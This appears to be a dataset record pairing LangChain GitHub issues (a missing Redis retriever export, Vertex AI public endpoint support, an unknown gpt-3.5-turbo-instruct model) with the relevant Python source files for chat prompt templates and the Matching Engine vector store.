c902a1545bfbc3015defcd1c3ee435d38db4ee34
"2023-09-08T16:43:51Z"
python
"2023-09-08T22:53:08Z"
libs/langchain/langchain/prompts/chat.py
"""Chat prompt template.""" from __future__ import annotations from abc import ABC, abstractmethod from pathlib import Path from typing import ( Any, Callable, Dict, List, Sequence, Set, Tuple, Type, TypeVar, Union, overload, ) from langchain._api import deprecated from langchain.load.serializable import Serializable from langchain.prompts.base import StringPromptTemplate from langchain.prompts.prompt import PromptTemplate from langchain.pydantic_v1 import Field, root_validator from langchain.schema import ( BasePromptTemplate, PromptValue, ) from langchain.schema.messages import ( AIMessage, BaseMessage, ChatMessage, HumanMessage, SystemMessage, get_buffer_string, ) class BaseMessagePromptTemplate(Serializable, ABC): """Base class for message prompt templates.""" @property def lc_serializable(self) -> bool: """Whether this object should be serialized. Returns: Whether this object should be serialized. """ return True @abstractmethod def format_messages(self, **kwargs: Any) -> List[BaseMessage]: """Format messages from kwargs. Should return a list of BaseMessages. Args: **kwargs: Keyword arguments to use for formatting. Returns: List of BaseMessages. """ @property @abstractmethod def input_variables(self) -> List[str]: """Input variables for this prompt template. Returns: List of input variables. """ def __add__(self, other: Any) -> ChatPromptTemplate: """Combine two prompt templates. Args: other: Another prompt template. Returns: Combined prompt template. """ prompt = ChatPromptTemplate(messages=[self]) return prompt + other class MessagesPlaceholder(BaseMessagePromptTemplate): """Prompt template that assumes variable is already list of messages.""" variable_name: str """Name of variable to use as messages.""" def format_messages(self, **kwargs: Any) -> List[BaseMessage]: """Format messages from kwargs. Args: **kwargs: Keyword arguments to use for formatting. Returns: List of BaseMessage. """ value = kwargs[self.variable_name] if not isinstance(value, list): raise ValueError( f"variable {self.variable_name} should be a list of base messages, " f"got {value}" ) for v in value: if not isinstance(v, BaseMessage): raise ValueError( f"variable {self.variable_name} should be a list of base messages," f" got {value}" ) return value @property def input_variables(self) -> List[str]: """Input variables for this prompt template. Returns: List of input variable names. """ return [self.variable_name] MessagePromptTemplateT = TypeVar( "MessagePromptTemplateT", bound="BaseStringMessagePromptTemplate" ) """Type variable for message prompt templates.""" class BaseStringMessagePromptTemplate(BaseMessagePromptTemplate, ABC): """Base class for message prompt templates that use a string prompt template.""" prompt: StringPromptTemplate """String prompt template.""" additional_kwargs: dict = Field(default_factory=dict) """Additional keyword arguments to pass to the prompt template.""" @classmethod def from_template( cls: Type[MessagePromptTemplateT], template: str, template_format: str = "f-string", **kwargs: Any, ) -> MessagePromptTemplateT: """Create a class from a string template. Args: template: a template. template_format: format of the template. **kwargs: keyword arguments to pass to the constructor. Returns: A new instance of this class. 
""" prompt = PromptTemplate.from_template(template, template_format=template_format) return cls(prompt=prompt, **kwargs) @classmethod def from_template_file( cls: Type[MessagePromptTemplateT], template_file: Union[str, Path], input_variables: List[str], **kwargs: Any, ) -> MessagePromptTemplateT: """Create a class from a template file. Args: template_file: path to a template file. String or Path. input_variables: list of input variables. **kwargs: keyword arguments to pass to the constructor. Returns: A new instance of this class. """ prompt = PromptTemplate.from_file(template_file, input_variables) return cls(prompt=prompt, **kwargs) @abstractmethod def format(self, **kwargs: Any) -> BaseMessage: """Format the prompt template. Args: **kwargs: Keyword arguments to use for formatting. Returns: Formatted message. """ def format_messages(self, **kwargs: Any) -> List[BaseMessage]: """Format messages from kwargs. Args: **kwargs: Keyword arguments to use for formatting. Returns: List of BaseMessages. """ return [self.format(**kwargs)] @property def input_variables(self) -> List[str]: """ Input variables for this prompt template. Returns: List of input variable names. """ return self.prompt.input_variables class ChatMessagePromptTemplate(BaseStringMessagePromptTemplate): """Chat message prompt template.""" role: str """Role of the message.""" def format(self, **kwargs: Any) -> BaseMessage: """Format the prompt template. Args: **kwargs: Keyword arguments to use for formatting. Returns: Formatted message. """ text = self.prompt.format(**kwargs) return ChatMessage( content=text, role=self.role, additional_kwargs=self.additional_kwargs ) class HumanMessagePromptTemplate(BaseStringMessagePromptTemplate): """Human message prompt template. This is a message that is sent to the user.""" def format(self, **kwargs: Any) -> BaseMessage: """Format the prompt template. Args: **kwargs: Keyword arguments to use for formatting. Returns: Formatted message. """ text = self.prompt.format(**kwargs) return HumanMessage(content=text, additional_kwargs=self.additional_kwargs) class AIMessagePromptTemplate(BaseStringMessagePromptTemplate): """AI message prompt template. This is a message that is not sent to the user.""" def format(self, **kwargs: Any) -> BaseMessage: """Format the prompt template. Args: **kwargs: Keyword arguments to use for formatting. Returns: Formatted message. """ text = self.prompt.format(**kwargs) return AIMessage(content=text, additional_kwargs=self.additional_kwargs) class SystemMessagePromptTemplate(BaseStringMessagePromptTemplate): """System message prompt template. This is a message that is not sent to the user. """ def format(self, **kwargs: Any) -> BaseMessage: """Format the prompt template. Args: **kwargs: Keyword arguments to use for formatting. Returns: Formatted message. """ text = self.prompt.format(**kwargs) return SystemMessage(content=text, additional_kwargs=self.additional_kwargs) class ChatPromptValue(PromptValue): """Chat prompt value. A type of a prompt value that is built from messages. """ messages: List[BaseMessage] """List of messages.""" def to_string(self) -> str: """Return prompt as string.""" return get_buffer_string(self.messages) def to_messages(self) -> List[BaseMessage]: """Return prompt as a list of messages.""" return self.messages class BaseChatPromptTemplate(BasePromptTemplate, ABC): """Base class for chat prompt templates.""" @property def lc_attributes(self) -> Dict: """ Return a list of attribute names that should be included in the serialized kwargs. 
These attributes must be accepted by the constructor. """ return {"input_variables": self.input_variables} def format(self, **kwargs: Any) -> str: """Format the chat template into a string. Args: **kwargs: keyword arguments to use for filling in template variables in all the template messages in this chat template. Returns: formatted string """ return self.format_prompt(**kwargs).to_string() def format_prompt(self, **kwargs: Any) -> PromptValue: """ Format prompt. Should return a PromptValue. Args: **kwargs: Keyword arguments to use for formatting. Returns: PromptValue. """ messages = self.format_messages(**kwargs) return ChatPromptValue(messages=messages) @abstractmethod def format_messages(self, **kwargs: Any) -> List[BaseMessage]: """Format kwargs into a list of messages.""" MessageLike = Union[BaseMessagePromptTemplate, BaseMessage, BaseChatPromptTemplate] MessageLikeRepresentation = Union[ MessageLike, Tuple[str, str], Tuple[Type, str], str, ] class ChatPromptTemplate(BaseChatPromptTemplate): """A prompt template for chat models. Use to create flexible templated prompts for chat models. Examples: .. code-block:: python from langchain.prompts import ChatPromptTemplate template = ChatPromptTemplate.from_messages([ ("system", "You are a helpful AI bot. Your name is {name}."), ("human", "Hello, how are you doing?"), ("ai", "I'm doing well, thanks!"), ("human", "{user_input}"), ]) messages = template.format_messages( name="Bob", user_input="What is your name?" ) """ input_variables: List[str] """List of input variables in template messages. Used for validation.""" messages: List[MessageLike] """List of messages consisting of either message prompt templates or messages.""" def __add__(self, other: Any) -> ChatPromptTemplate: """Combine two prompt templates. Args: other: Another prompt template. Returns: Combined prompt template. """ # Allow for easy combining if isinstance(other, ChatPromptTemplate): return ChatPromptTemplate(messages=self.messages + other.messages) elif isinstance( other, (BaseMessagePromptTemplate, BaseMessage, BaseChatPromptTemplate) ): return ChatPromptTemplate(messages=self.messages + [other]) elif isinstance(other, (list, tuple)): _other = ChatPromptTemplate.from_messages(other) return ChatPromptTemplate(messages=self.messages + _other.messages) elif isinstance(other, str): prompt = HumanMessagePromptTemplate.from_template(other) return ChatPromptTemplate(messages=self.messages + [prompt]) else: raise NotImplementedError(f"Unsupported operand type for +: {type(other)}") @root_validator(pre=True) def validate_input_variables(cls, values: dict) -> dict: """Validate input variables. If input_variables is not set, it will be set to the union of all input variables in the messages. Args: values: values to validate. Returns: Validated values. """ messages = values["messages"] input_vars = set() for message in messages: if isinstance(message, (BaseMessagePromptTemplate, BaseChatPromptTemplate)): input_vars.update(message.input_variables) if "partial_variables" in values: input_vars = input_vars - set(values["partial_variables"]) if "input_variables" in values: if input_vars != set(values["input_variables"]): raise ValueError( "Got mismatched input_variables. " f"Expected: {input_vars}. " f"Got: {values['input_variables']}" ) else: values["input_variables"] = sorted(input_vars) return values @classmethod def from_template(cls, template: str, **kwargs: Any) -> ChatPromptTemplate: """Create a chat prompt template from a template string. 
Creates a chat template consisting of a single message assumed to be from the human. Args: template: template string **kwargs: keyword arguments to pass to the constructor. Returns: A new instance of this class. """ prompt_template = PromptTemplate.from_template(template, **kwargs) message = HumanMessagePromptTemplate(prompt=prompt_template) return cls.from_messages([message]) @classmethod @deprecated("0.0.260", alternative="from_messages classmethod", pending=True) def from_role_strings( cls, string_messages: List[Tuple[str, str]] ) -> ChatPromptTemplate: """Create a chat prompt template from a list of (role, template) tuples. Args: string_messages: list of (role, template) tuples. Returns: a chat prompt template """ return cls( messages=[ ChatMessagePromptTemplate.from_template(template, role=role) for role, template in string_messages ] ) @classmethod @deprecated("0.0.260", alternative="from_messages classmethod", pending=True) def from_strings( cls, string_messages: List[Tuple[Type[BaseMessagePromptTemplate], str]] ) -> ChatPromptTemplate: """Create a chat prompt template from a list of (role class, template) tuples. Args: string_messages: list of (role class, template) tuples. Returns: a chat prompt template """ return cls.from_messages(string_messages) @classmethod def from_messages( cls, messages: Sequence[MessageLikeRepresentation], ) -> ChatPromptTemplate: """Create a chat prompt template from a variety of message formats. Examples: Instantiation from a list of message templates: .. code-block:: python template = ChatPromptTemplate.from_messages([ ("human", "Hello, how are you?"), ("ai", "I'm doing well, thanks!"), ("human", "That's good to hear."), ]) Instantiation from mixed message formats: .. code-block:: python template = ChatPromptTemplate.from_messages([ SystemMessage(content="hello"), ("human", "Hello, how are you?"), ]) Args: messages: sequence of message representations. A message can be represented using the following formats: (1) BaseMessagePromptTemplate, (2) BaseMessage, (3) 2-tuple of (message type, template); e.g., ("human", "{user_input}"), (4) 2-tuple of (message class, template), (4) a string which is shorthand for ("human", template); e.g., "{user_input}" Returns: a chat prompt template """ _messages = [_convert_to_message(message) for message in messages] # Automatically infer input variables from messages input_vars: Set[str] = set() for _message in _messages: if isinstance( _message, (BaseChatPromptTemplate, BaseMessagePromptTemplate) ): input_vars.update(_message.input_variables) return cls(input_variables=sorted(input_vars), messages=_messages) def format(self, **kwargs: Any) -> str: """Format the chat template into a string. Args: **kwargs: keyword arguments to use for filling in template variables in all the template messages in this chat template. Returns: formatted string """ return self.format_prompt(**kwargs).to_string() def format_messages(self, **kwargs: Any) -> List[BaseMessage]: """Format the chat template into a list of finalized messages. Args: **kwargs: keyword arguments to use for filling in template variables in all the template messages in this chat template. 
Returns: list of formatted messages """ kwargs = self._merge_partial_and_user_variables(**kwargs) result = [] for message_template in self.messages: if isinstance(message_template, BaseMessage): result.extend([message_template]) elif isinstance( message_template, (BaseMessagePromptTemplate, BaseChatPromptTemplate) ): rel_params = { k: v for k, v in kwargs.items() if k in message_template.input_variables } message = message_template.format_messages(**rel_params) result.extend(message) else: raise ValueError(f"Unexpected input: {message_template}") return result def partial(self, **kwargs: Union[str, Callable[[], str]]) -> ChatPromptTemplate: """Get a new ChatPromptTemplate with some input variables already filled in. Args: **kwargs: keyword arguments to use for filling in template variables. Ought to be a subset of the input variables. Returns: A new ChatPromptTemplate. Example: .. code-block:: python from langchain.prompts import ChatPromptTemplate template = ChatPromptTemplate.from_messages( [ ("system", "You are an AI assistant named {name}."), ("human", "Hi I'm {user}"), ("ai", "Hi there, {user}, I'm {name}."), ("human", "{input}"), ] ) template2 = template.partial(user="Lucy", name="R2D2") template2.format_messages(input="hello") """ prompt_dict = self.__dict__.copy() prompt_dict["input_variables"] = list( set(self.input_variables).difference(kwargs) ) prompt_dict["partial_variables"] = {**self.partial_variables, **kwargs} return type(self)(**prompt_dict) def append(self, message: MessageLikeRepresentation) -> None: """Append message to the end of the chat template. Args: message: representation of a message to append. """ self.messages.append(_convert_to_message(message)) def extend(self, messages: Sequence[MessageLikeRepresentation]) -> None: """Extend the chat template with a sequence of messages.""" self.messages.extend([_convert_to_message(message) for message in messages]) @overload def __getitem__(self, index: int) -> MessageLike: ... @overload def __getitem__(self, index: slice) -> ChatPromptTemplate: ... def __getitem__( self, index: Union[int, slice] ) -> Union[MessageLike, ChatPromptTemplate]: """Use to index into the chat template.""" if isinstance(index, slice): start, stop, step = index.indices(len(self.messages)) messages = self.messages[start:stop:step] return ChatPromptTemplate.from_messages(messages) else: return self.messages[index] def __len__(self) -> int: """Get the length of the chat template.""" return len(self.messages) @property def _prompt_type(self) -> str: """Name of prompt type.""" return "chat" def save(self, file_path: Union[Path, str]) -> None: """Save prompt to file. Args: file_path: path to file. """ raise NotImplementedError() def _create_template_from_message_type( message_type: str, template: str ) -> BaseMessagePromptTemplate: """Create a message prompt template from a message type and template string. Args: message_type: str the type of the message template (e.g., "human", "ai", etc.) template: str the template string. Returns: a message prompt template of the appropriate type. """ if message_type in ("human", "user"): message: BaseMessagePromptTemplate = HumanMessagePromptTemplate.from_template( template ) elif message_type in ("ai", "assistant"): message = AIMessagePromptTemplate.from_template(template) elif message_type == "system": message = SystemMessagePromptTemplate.from_template(template) else: raise ValueError( f"Unexpected message type: {message_type}. Use one of 'human'," f" 'user', 'ai', 'assistant', or 'system'." 
) return message def _convert_to_message( message: MessageLikeRepresentation, ) -> Union[BaseMessage, BaseMessagePromptTemplate, BaseChatPromptTemplate]: """Instantiate a message from a variety of message formats. The message format can be one of the following: - BaseMessagePromptTemplate - BaseMessage - 2-tuple of (role string, template); e.g., ("human", "{user_input}") - 2-tuple of (message class, template) - string: shorthand for ("human", template); e.g., "{user_input}" Args: message: a representation of a message in one of the supported formats Returns: an instance of a message or a message template """ if isinstance(message, (BaseMessagePromptTemplate, BaseChatPromptTemplate)): _message: Union[ BaseMessage, BaseMessagePromptTemplate, BaseChatPromptTemplate ] = message elif isinstance(message, BaseMessage): _message = message elif isinstance(message, str): _message = _create_template_from_message_type("human", message) elif isinstance(message, tuple): if len(message) != 2: raise ValueError(f"Expected 2-tuple of (role, template), got {message}") message_type_str, template = message if isinstance(message_type_str, str): _message = _create_template_from_message_type(message_type_str, template) else: _message = message_type_str(prompt=PromptTemplate.from_template(template)) else: raise NotImplementedError(f"Unsupported message type: {type(message)}") return _message
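As a usage note on the `__add__` overloads implemented in `ChatPromptTemplate` above, a short sketch (the template strings are illustrative):

```python
from langchain.prompts import ChatPromptTemplate

base = ChatPromptTemplate.from_messages([("system", "You are {name}.")])
# A str operand is appended as a HumanMessagePromptTemplate.
combined = base + "{user_input}"
# A list operand is converted via ChatPromptTemplate.from_messages.
combined = combined + [("ai", "Understood.")]
print(combined.format_messages(name="R2D2", user_input="hello"))
```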
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
10,186
Issue: RedisVectorStoreRetriever not accessible
### Issue you'd like to raise. After PR [#8612](https://github.com/langchain-ai/langchain/pull/8612), access to [RedisVectorStoreRetriever](https://github.com/langchain-ai/langchain/blob/27944cb611ee8face34fbe764c83e37841f96eb7/libs/langchain/langchain/vectorstores/redis/base.py#L1293) has been removed. ### Suggestion: Include the **RedisVectorStoreRetriever** import in [redis/__init__.py](https://github.com/langchain-ai/langchain/blob/27944cb611ee8face34fbe764c83e37841f96eb7/libs/langchain/langchain/vectorstores/redis/__init__.py) on line 1. Current: `from .base import Redis` Suggested update: `from .base import Redis, RedisVectorStoreRetriever`
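Applying that suggestion, the updated `redis/__init__.py` might look like the sketch below; extending `__all__` as well is an assumption beyond the issue text, but it keeps the public export list consistent:

```python
from .base import Redis, RedisVectorStoreRetriever
from .filters import (
    RedisFilter,
    RedisNum,
    RedisTag,
    RedisText,
)

__all__ = [
    "Redis",
    "RedisFilter",
    "RedisTag",
    "RedisText",
    "RedisNum",
    "RedisVectorStoreRetriever",
]
```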
https://github.com/langchain-ai/langchain/issues/10186
https://github.com/langchain-ai/langchain/pull/10414
d09ef9eb52466f991fc155567f234e5351f20d06
65e1606daa696e2190fcb410f190c6811f9f8dc3
"2023-09-04T14:21:34Z"
python
"2023-09-10T00:46:34Z"
libs/langchain/langchain/vectorstores/redis/__init__.py
from .base import Redis from .filters import ( RedisFilter, RedisNum, RedisTag, RedisText, ) __all__ = ["Redis", "RedisFilter", "RedisTag", "RedisText", "RedisNum"]
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
8,378
GCP Matching Engine support for public index endpoints
### System Info langchain==0.0.244 ### Who can help? _No response_ ### Information - [X] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [X] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction Create a new Matching Engine Index Endpoint that is public. Follow the tutorial to make a similarity search: ``` vector_store = MatchingEngine.from_components( project_id="", region="us-central1", gcs_bucket_name="", index_id="", endpoint_id="", embedding=embeddings, ) vector_store.similarity_search("what is a cat?", k=5) ``` Error: ``` File ~/code/gcp-langchain-retrieval-augmentation/embeddings/.venv/lib/python3.9/site-packages/grpc/_channel.py:1030, in _UnaryUnaryMultiCallable.__call__(self, request, timeout, metadata, credentials, wait_for_ready, compression) 1021 def __call__(self, 1022 request: Any, 1023 timeout: Optional[float] = None, (...) 1026 wait_for_ready: Optional[bool] = None, 1027 compression: Optional[grpc.Compression] = None) -> Any: 1028 state, call, = self._blocking(request, timeout, metadata, credentials, 1029 wait_for_ready, compression) -> 1030 return _end_unary_response_blocking(state, call, False, None) File ~/code/gcp-langchain-retrieval-augmentation/embeddings/.venv/lib/python3.9/site-packages/grpc/_channel.py:910, in _end_unary_response_blocking(state, call, with_call, deadline) 908 return state.response 909 else: --> 910 raise _InactiveRpcError(state) _InactiveRpcError: <_InactiveRpcError of RPC that terminated with: status = StatusCode.UNAVAILABLE details = "DNS resolution failed for :10000: unparseable host:port" debug_error_string = "UNKNOWN:DNS resolution failed for :10000: unparseable host:port {created_time:"2023-07-27T20:12:23.727315699+00:00", grpc_status:14}" > ``` ### Expected behavior It should be possible to do this. The VertexAI Python SDK supports it with the `endpoint.find_neighbors` function. I think just changing [the wrapper](https://github.com/langchain-ai/langchain/blob/master/libs/langchain/langchain/vectorstores/matching_engine.py#L178) from `.match` to `.find_neighbors` for when the endpoint is public should do it.
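A sketch of the suggested change inside `MatchingEngine.similarity_search`, dispatching on whether the endpoint is public (the `public_endpoint_domain_name` check and the `find_neighbors` call follow the Vertex AI SDK as I understand it, and should be verified against the SDK version in use):

```python
# Hypothetical patch inside MatchingEngine.similarity_search.
embedding_query = self.embedding.embed_documents([query])
if getattr(self.endpoint, "public_endpoint_domain_name", None):
    # Public index endpoints are queried over HTTPS via find_neighbors().
    response = self.endpoint.find_neighbors(
        deployed_index_id=self._get_index_id(),
        queries=embedding_query,
        num_neighbors=k,
    )
else:
    # Private (VPC-peered) endpoints keep using the gRPC match() call.
    response = self.endpoint.match(
        deployed_index_id=self._get_index_id(),
        queries=embedding_query,
        num_neighbors=k,
    )
```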
https://github.com/langchain-ai/langchain/issues/8378
https://github.com/langchain-ai/langchain/pull/10056
4f19ba306597eb753ea397d4b646dc75c2668cbe
21b236e5e4fc5c6e22bab61967b6e56895c4fa15
"2023-07-27T20:14:21Z"
python
"2023-09-19T23:16:04Z"
libs/langchain/langchain/vectorstores/matching_engine.py
from __future__ import annotations import json import logging import time import uuid from typing import TYPE_CHECKING, Any, Iterable, List, Optional, Type from langchain.docstore.document import Document from langchain.embeddings import TensorflowHubEmbeddings from langchain.schema.embeddings import Embeddings from langchain.vectorstores.base import VectorStore if TYPE_CHECKING: from google.cloud import storage from google.cloud.aiplatform import MatchingEngineIndex, MatchingEngineIndexEndpoint from google.oauth2.service_account import Credentials logger = logging.getLogger() class MatchingEngine(VectorStore): """`Google Vertex AI Matching Engine` vector store. While the embeddings are stored in the Matching Engine, the embedded documents will be stored in GCS. An existing Index and corresponding Endpoint are preconditions for using this module. See usage in docs/modules/indexes/vectorstores/examples/matchingengine.ipynb Note that this implementation is mostly meant for reading if you are planning to do a real time implementation. While reading is a real time operation, updating the index takes close to one hour.""" def __init__( self, project_id: str, index: MatchingEngineIndex, endpoint: MatchingEngineIndexEndpoint, embedding: Embeddings, gcs_client: storage.Client, gcs_bucket_name: str, credentials: Optional[Credentials] = None, ): """Vertex Matching Engine implementation of the vector store. While the embeddings are stored in the Matching Engine, the embedded documents will be stored in GCS. An existing Index and corresponding Endpoint are preconditions for using this module. See usage in docs/modules/indexes/vectorstores/examples/matchingengine.ipynb. Note that this implementation is mostly meant for reading if you are planning to do a real time implementation. While reading is a real time operation, updating the index takes close to one hour. Attributes: project_id: The GCS project id. index: The created index class. See ~:func:`MatchingEngine.from_components`. endpoint: The created endpoint class. See ~:func:`MatchingEngine.from_components`. embedding: A :class:`Embeddings` that will be used for embedding the text sent. If none is sent, then the multilingual Tensorflow Universal Sentence Encoder will be used. gcs_client: The GCS client. gcs_bucket_name: The GCS bucket name. credentials (Optional): Created GCP credentials. """ super().__init__() self._validate_google_libraries_installation() self.project_id = project_id self.index = index self.endpoint = endpoint self.embedding = embedding self.gcs_client = gcs_client self.credentials = credentials self.gcs_bucket_name = gcs_bucket_name @property def embeddings(self) -> Embeddings: return self.embedding def _validate_google_libraries_installation(self) -> None: """Validates that Google libraries that are needed are installed.""" try: from google.cloud import aiplatform, storage # noqa: F401 from google.oauth2 import service_account # noqa: F401 except ImportError: raise ImportError( "You must run `pip install --upgrade " "google-cloud-aiplatform google-cloud-storage`" "to use the MatchingEngine Vectorstore." ) def add_texts( self, texts: Iterable[str], metadatas: Optional[List[dict]] = None, **kwargs: Any, ) -> List[str]: """Run more texts through the embeddings and add to the vectorstore. Args: texts: Iterable of strings to add to the vectorstore. metadatas: Optional list of metadatas associated with the texts. kwargs: vectorstore specific parameters. Returns: List of ids from adding the texts into the vectorstore. 
""" logger.debug("Embedding documents.") embeddings = self.embedding.embed_documents(list(texts)) jsons = [] ids = [] # Could be improved with async. for embedding, text in zip(embeddings, texts): id = str(uuid.uuid4()) ids.append(id) jsons.append({"id": id, "embedding": embedding}) self._upload_to_gcs(text, f"documents/{id}") logger.debug(f"Uploaded {len(ids)} documents to GCS.") # Creating json lines from the embedded documents. result_str = "\n".join([json.dumps(x) for x in jsons]) filename_prefix = f"indexes/{uuid.uuid4()}" filename = f"{filename_prefix}/{time.time()}.json" self._upload_to_gcs(result_str, filename) logger.debug( f"Uploaded updated json with embeddings to " f"{self.gcs_bucket_name}/{filename}." ) self.index = self.index.update_embeddings( contents_delta_uri=f"gs://{self.gcs_bucket_name}/{filename_prefix}/" ) logger.debug("Updated index with new configuration.") return ids def _upload_to_gcs(self, data: str, gcs_location: str) -> None: """Uploads data to gcs_location. Args: data: The data that will be stored. gcs_location: The location where the data will be stored. """ bucket = self.gcs_client.get_bucket(self.gcs_bucket_name) blob = bucket.blob(gcs_location) blob.upload_from_string(data) def similarity_search( self, query: str, k: int = 4, **kwargs: Any ) -> List[Document]: """Return docs most similar to query. Args: query: The string that will be used to search for similar documents. k: The amount of neighbors that will be retrieved. Returns: A list of k matching documents. """ logger.debug(f"Embedding query {query}.") embedding_query = self.embedding.embed_documents([query]) response = self.endpoint.match( deployed_index_id=self._get_index_id(), queries=embedding_query, num_neighbors=k, ) if len(response) == 0: return [] logger.debug(f"Found {len(response)} matches for the query {query}.") results = [] # I'm only getting the first one because queries receives an array # and the similarity_search method only receives one query. This # means that the match method will always return an array with only # one element. for doc in response[0]: page_content = self._download_from_gcs(f"documents/{doc.id}") results.append(Document(page_content=page_content)) logger.debug("Downloaded documents for query.") return results def _get_index_id(self) -> str: """Gets the correct index id for the endpoint. Returns: The index id if found (which should be found) or throws ValueError otherwise. """ for index in self.endpoint.deployed_indexes: if index.index == self.index.resource_name: return index.id raise ValueError( f"No index with id {self.index.resource_name} " f"deployed on endpoint " f"{self.endpoint.display_name}." ) def _download_from_gcs(self, gcs_location: str) -> str: """Downloads from GCS in text format. Args: gcs_location: The location where the file is located. Returns: The string contents of the file. """ bucket = self.gcs_client.get_bucket(self.gcs_bucket_name) blob = bucket.blob(gcs_location) return blob.download_as_string() @classmethod def from_texts( cls: Type["MatchingEngine"], texts: List[str], embedding: Embeddings, metadatas: Optional[List[dict]] = None, **kwargs: Any, ) -> "MatchingEngine": """Use from components instead.""" raise NotImplementedError( "This method is not implemented. 
Instead, you should initialize the class" " with `MatchingEngine.from_components(...)` and then call " "`add_texts`" ) @classmethod def from_components( cls: Type["MatchingEngine"], project_id: str, region: str, gcs_bucket_name: str, index_id: str, endpoint_id: str, credentials_path: Optional[str] = None, embedding: Optional[Embeddings] = None, ) -> "MatchingEngine": """Takes the object creation out of the constructor. Args: project_id: The GCP project id. region: The default location making the API calls. It must have the same location as the GCS bucket and must be regional. gcs_bucket_name: The location where the vectors will be stored in order for the index to be created. index_id: The id of the created index. endpoint_id: The id of the created endpoint. credentials_path: (Optional) The path of the Google credentials on the local file system. embedding: The :class:`Embeddings` that will be used for embedding the texts. Returns: A configured MatchingEngine with the texts added to the index. """ gcs_bucket_name = cls._validate_gcs_bucket(gcs_bucket_name) credentials = cls._create_credentials_from_file(credentials_path) index = cls._create_index_by_id(index_id, project_id, region, credentials) endpoint = cls._create_endpoint_by_id( endpoint_id, project_id, region, credentials ) gcs_client = cls._get_gcs_client(credentials, project_id) cls._init_aiplatform(project_id, region, gcs_bucket_name, credentials) return cls( project_id=project_id, index=index, endpoint=endpoint, embedding=embedding or cls._get_default_embeddings(), gcs_client=gcs_client, credentials=credentials, gcs_bucket_name=gcs_bucket_name, ) @classmethod def _validate_gcs_bucket(cls, gcs_bucket_name: str) -> str: """Validates the gcs_bucket_name as a bucket name. Args: gcs_bucket_name: The received bucket uri. Returns: A valid gcs_bucket_name or throws ValueError if full path is provided. """ gcs_bucket_name = gcs_bucket_name.replace("gs://", "") if "/" in gcs_bucket_name: raise ValueError( f"The argument gcs_bucket_name should only be " f"the bucket name. Received {gcs_bucket_name}" ) return gcs_bucket_name @classmethod def _create_credentials_from_file( cls, json_credentials_path: Optional[str] ) -> Optional[Credentials]: """Creates credentials for GCP. Args: json_credentials_path: The path on the file system where the credentials are stored. Returns: An optional of Credentials or None, in which case the default will be used. """ from google.oauth2 import service_account credentials = None if json_credentials_path is not None: credentials = service_account.Credentials.from_service_account_file( json_credentials_path ) return credentials @classmethod def _create_index_by_id( cls, index_id: str, project_id: str, region: str, credentials: "Credentials" ) -> MatchingEngineIndex: """Creates a MatchingEngineIndex object by id. Args: index_id: The created index id. project_id: The project to retrieve index from. region: Location to retrieve index from. credentials: GCS credentials. Returns: A configured MatchingEngineIndex. """ from google.cloud import aiplatform logger.debug(f"Creating matching engine index with id {index_id}.") return aiplatform.MatchingEngineIndex( index_name=index_id, project=project_id, location=region, credentials=credentials, ) @classmethod def _create_endpoint_by_id( cls, endpoint_id: str, project_id: str, region: str, credentials: "Credentials" ) -> MatchingEngineIndexEndpoint: """Creates a MatchingEngineIndexEndpoint object by id. Args: endpoint_id: The created endpoint id. 
project_id: The project to retrieve index from. region: Location to retrieve index from. credentials: GCS credentials. Returns: A configured MatchingEngineIndexEndpoint. """ from google.cloud import aiplatform logger.debug(f"Creating endpoint with id {endpoint_id}.") return aiplatform.MatchingEngineIndexEndpoint( index_endpoint_name=endpoint_id, project=project_id, location=region, credentials=credentials, ) @classmethod def _get_gcs_client( cls, credentials: "Credentials", project_id: str ) -> "storage.Client": """Lazily creates a GCS client. Returns: A configured GCS client. """ from google.cloud import storage return storage.Client(credentials=credentials, project=project_id) @classmethod def _init_aiplatform( cls, project_id: str, region: str, gcs_bucket_name: str, credentials: "Credentials", ) -> None: """Configures the aiplatform library. Args: project_id: The GCP project id. region: The default location making the API calls. It must have the same location as the GCS bucket and must be regional. gcs_bucket_name: GCS staging location. credentials: The GCS Credentials object. """ from google.cloud import aiplatform logger.debug( f"Initializing AI Platform for project {project_id} on " f"{region} and for {gcs_bucket_name}." ) aiplatform.init( project=project_id, location=region, staging_bucket=gcs_bucket_name, credentials=credentials, ) @classmethod def _get_default_embeddings(cls) -> TensorflowHubEmbeddings: """This function returns the default embedding. Returns: Default TensorflowHubEmbeddings to use. """ return TensorflowHubEmbeddings()
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
10,806
Error when using gpt-3.5-turbo-instruct: model_token_mapping is missing an entry for gpt-3.5-turbo-instruct
### System Info LangChain version: 0.0.295 (just upgraded to this version to use gpt-3.5-turbo-instruct) ### Who can help? @hwchase17 @agola ### Information - [ ] The official example notebooks/scripts - [X] My own modified scripts ### Related Components - [X] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction Minimal code to reproduce: ```python # load OpenAI API Key from langchain.llms import OpenAI llm = OpenAI(temperature=0.1, model_name="gpt-3.5-turbo-instruct", max_tokens=-1) llm("give me a list of Chinese dishes and their recipes") ``` Error message: >```ValueError: Unknown model: gpt-3.5-turbo-instruct. Please provide a valid OpenAI model name.Known models are: gpt-4, gpt-4-0314, gpt-4-0613, gpt-4-32k, gpt-4-32k-0314, gpt-4-32k-0613, gpt-3.5-turbo, gpt-3.5-turbo-0301, gpt-3.5-turbo-0613, gpt-3.5-turbo-16k, gpt-3.5-turbo-16k-0613, text-ada-001, ada, text-babbage-001, babbage, text-curie-001, curie, davinci, text-davinci-003, text-davinci-002, code-davinci-002, code-davinci-001, code-cushman-002, code-cushman-001``` Cause of the error: looks like it's because the `model_token_mapping` is missing an entry for `gpt-3.5-turbo-instruct`: https://github.com/langchain-ai/langchain/blob/master/libs/langchain/langchain/llms/openai.py#L555 ### Expected behavior The code succeeds without error
